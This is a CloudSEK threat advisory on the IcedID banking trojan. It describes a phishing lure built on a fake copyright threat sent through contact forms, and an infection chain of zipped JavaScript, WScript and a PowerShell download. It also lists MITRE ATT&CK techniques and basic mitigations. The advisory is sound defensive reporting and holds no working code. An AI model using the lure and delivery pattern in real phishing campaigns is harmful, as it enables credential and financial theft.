IcedID Banking Trojan Malware Threat Intel Advisory

CloudSEK threat intelligence advisory on IcedID Banking Trojan Malware that steals financial information. It also acts as a dropper for other malware.
Updated on
April 19, 2023
Published on
May 10, 2021
Subscribe to the latest industry news, threats and resources.
Advisory Type
Malware Intelligence
Malware Name
Malware Aliases
Malware Type
Banking Trojan
Target OS

Executive Summary

First noticed in 2017, IcedID is a banking trojan that steals financial information. IcedID has also been leveraged as a dropper for other malware and in the infection stage of ransomware operations. This malware follows multiple delivery methods, out of which phishing emails with macro embedded attachments are the most prevalent. In a recent campaign involving IcedID, attackers abused website contact forms of multiple enterprises, used emails laced with malicious links, which when clicked downloaded a malicious .zip file. These emails, usually, tend to create a sense of urgency, provoking immediate action. For instance, the sender pretends to be a photographer threatening legal action against the company for using his photos on their site, without permission. The sender then shares a malicious link which purports to be evidence that proves the incident. On clicking the link, however, the recipient is navigated to a Google page that downloads the malicious .zip file.

Technical Analysis

The phishing emails that IcedID campaigns use contain a malicious link, that when clicked on loads a Google page. This page then requires the unsuspecting victim to sign in with their google credentials. Upon signing in a malicious zip file is automatically downloaded on the victim’s machine. If at all the first link fails, they are redirected to a .top domain which then leads to a Google User Content page that downloads the malicious zip file. Stages of execution:
  • The zip file contains a malicious JavaScript that is executed via WScript
  • A Shell object is created after executing the previous JS file
  • The Shell object launches PowerShell to download the IcedID payload in .dat format
  • The IcedID payload is well encrypted to escape detection


Technical Impact
  • IcedID is a banking trojan that steals the victim’s banking credentials and other financial information in the infected system and sends the information gathered to the attacker’s C2.
  • IcedID also acts as a loader for other types of payloads like ransomware, furthering other forms of attacks.
Business Impact
  • The banking trojan affects the privacy of its victims and abuses their financial information.
  • Infecting the system with ransomware will have an adverse impact on the business and its reputation.


  • Raise awareness about phishing emails and malicious links.
  • Use Multi-Factor Authentication for all accounts.
  • Users are advised to patch their systems and always be up to date.
  • Use the latest AV software.

Tactics, Techniques, and Procedures

T1594 Search victim-owned websites
Initial Access
T1566.001 Spear phishing attachment
T1566.002 Spear phishing link
T1078.002 Domain accounts
T1059 Command and scripting interpreter
T1059.001 PowerShell
T1053.005 Scheduled Task
T1204.001 Malicious link
T1047 Windows management Instrumentation
T1053.005 Scheduled Task
Privilege Escalation
T1055 Process injection
T1053.005 Scheduled Task
Defense Evasion
T1055 Process injection
T1218.011 Rundll32
T1553.002 Code signing
Credential Access
T1555.003 Credentials from web browsers
T1482 Domain trust discovery
T1018 Remote system discovery
T1518.001 Security software discovery
T1082 System information discovery
T1016 System network configuration discovery
Lateral Movement
T1021.001 Remote Desktop Protocol
T1021.002 SMB/Windows admin shares
T1185 Man in the browser
Command and Control
T1071 Application Layer Protocol
T1048.002 Exfiltration over asymmetric encrypted non-C2 protocol
T1486 Data encrypted for impact

Indicators of Compromise

File Hash – SHA1

Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Dashboard mockup
Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.
Trusted by 400+ Top organisations